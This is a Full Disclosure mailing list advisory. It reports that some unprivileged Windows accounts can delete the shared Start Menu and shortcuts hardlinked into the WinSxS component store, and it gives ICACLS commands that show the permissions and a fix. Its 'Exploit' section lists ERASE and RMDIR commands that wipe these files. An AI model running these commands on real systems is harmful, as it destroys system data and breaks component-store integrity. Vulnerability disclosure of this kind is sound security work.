Full Disclosure mailing list archives

Hi @ll,

the following is a condensed form of
<https://skanthak.hier-im-netz.de/whispers.html#whisper3> and
<https://skanthak.hier-im-netz.de/whispers.html#whisper4>.

Windows Vista moved the shared start menu from "%ALLUSERSPROFILE%\Start Menu\"
to "%ProgramData%\Microsoft\Windows\Start Menu\", with some shortcuts (*.lnk)
"reflected" from the (immutable) component store below %SystemRoot%\WinSxS\

JFTR: "reflection" is M$FT lingo for hardlink into the component store.

Before this move only Administrators had write access to the shared start menu;
afterwards at least the user account(s) created during Windows setup (OOBE,
out of box experience) are granted DELETE and DELETE_CHILD access permission.

Demonstration
~~~~~~~~~~~~~

Log on to an arbitrary (unprivileged) user account, start the command processor
and run the following command line to display the access permissions of the
shared start menu:

ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu"

| C:\ProgramData\Microsoft\Windows\Start Menu COMPUTER\User:(OI)(CI)(IO)(DE,DC)
|                                             S-1-5-21-xxx-yyy-zzz-1000:(OI)(CI)(IO)(DE,DC)
|                                             COMPUTER\Administrator:(OI)(CI)(IO)(DE,DC)
|                                             NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
|                                             BUILTIN\Administrators:(I)(OI)(CI)(F)
|                                             BUILTIN\Users:(I)(OI)(CI)(RX)
|                                             Everyone:(I)(OI)(CI)(RX)

Instead of "COMPUTER" you get your computer name (see the environment variables
%COMPUTERNAME% and %USERDOMAIN%); instead of "User" and "Administrator" you get
the first/primary and the localized administrator account name.

"(OI)(CI)(IO)(DE,DC)" means "inherit DELETE and DELETE CHILD access permission
to all objects/files and containers/directories below this directory".

Run the following command line to confirm the latter:

ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu" /C /Q /T | FINDSTR.EXE /L "%ProgramData% (DE,DC)"

"Thanks" to the braindead "reflection" of shortcuts (generally: files) from
the component store their access permissions are changed too:

ICACLS.EXE "%SystemRoot%\WinSxS\*.lnk" /C /Q /T | FINDSTR.EXE /L "%SystemRoot% (DE,DC)"

Exploit
~~~~~~~

"Thanks" to the DELETE_CHILD access permission some unprivileged users can
since NINETEEN years remove the shared start menu COMPLETELY!

ERASE /A:HS /F /Q /S "%ProgramData%\Microsoft\Windows\Start Menu\desktop.ini"
ERASE /F /Q /S "%ProgramData%\Microsoft\Windows\Start Menu\*.lnk"
RMDIR /Q /S "%ProgramData%\Microsoft\Windows\Start Menu"

"Thanks" to the braindead "reflection" of shortcuts (generally: files) from
the component store the same unprivileged users can also erase them there
and destroy the integrity of the component store:

ERASE /F /Q /S "%SystemRoot%\WinSxS\*.lnk"

Fix
~~~

Remove the SUPERFLUOUS access permissions (needs SE_RESTORE_PRIVILEGE):

ICACLS.EXE "%ProgramData%\Microsoft\Windows\Start Menu" /C /Q /Remove:g "%USERDOMAIN%\Administrator" 
"%USERDOMAIN%\%USERNAME%"
"%USERDOMAIN%\User" *S-1-5-21-xxx-yyy-zzz-RID ... /T
ICACLS.EXE "%SystemRoot%\WinSxS\*.lnk" /C /Q /Remove:g "%USERDOMAIN%\Administrator" "%USERDOMAIN%\%USERNAME%" 
"%USERDOMAIN%\User"
*S-1-5-21-xxx-yyy-zzz-RID ... /T

stay tuned, and far away from unprotected system( file)s
Stefan Kanthak

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

• Defense in depth -- the Microsoft way (part 95): the (shared) "Start Menu" is dispensable Stefan Kanthak via Fulldisclosure (Jan 10)